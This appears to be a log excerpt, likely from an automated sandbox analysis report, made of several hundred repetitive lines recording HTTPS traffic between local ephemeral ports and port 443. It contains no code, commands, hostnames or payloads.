Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 60552 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60532
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60531
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60517 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60539
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60538
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60537
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60536
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60535
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60534
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 60528 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 60484 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60541
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60541 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60549
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60548
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60547
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 60495 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60552
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60550
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60473 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60496 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60563
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60560
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60527 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60471 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60494 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 60576 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60531 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60503
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60502
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60518
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60517
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60512
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 60526 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60521
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60520
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60529
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60528
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60527
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 60472 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60526
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60524
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60523
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60522
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60499
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60498
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60497
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60496
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60495
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60494
Source: unknown	Network traffic detected: HTTP traffic on port 60532 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60475 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60498 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60503 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60502 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60487 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60476 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60576
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60575
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60574
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60573
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60572
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60571
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60570
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60524 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60466
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60465
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60474 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60468
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60467
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60480
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60477
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60476
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60475
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60474
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60473
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60472
Source: unknown	Network traffic detected: HTTP traffic on port 60534 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60471
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60470
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60479
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60478
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60486 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60487
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60486
Source: unknown	Network traffic detected: HTTP traffic on port 60512 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60484
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60482
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60481
Source: unknown	Network traffic detected: HTTP traffic on port 60497 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60466 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60523 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60535 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60478 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60465 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60547 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60570 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60522 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
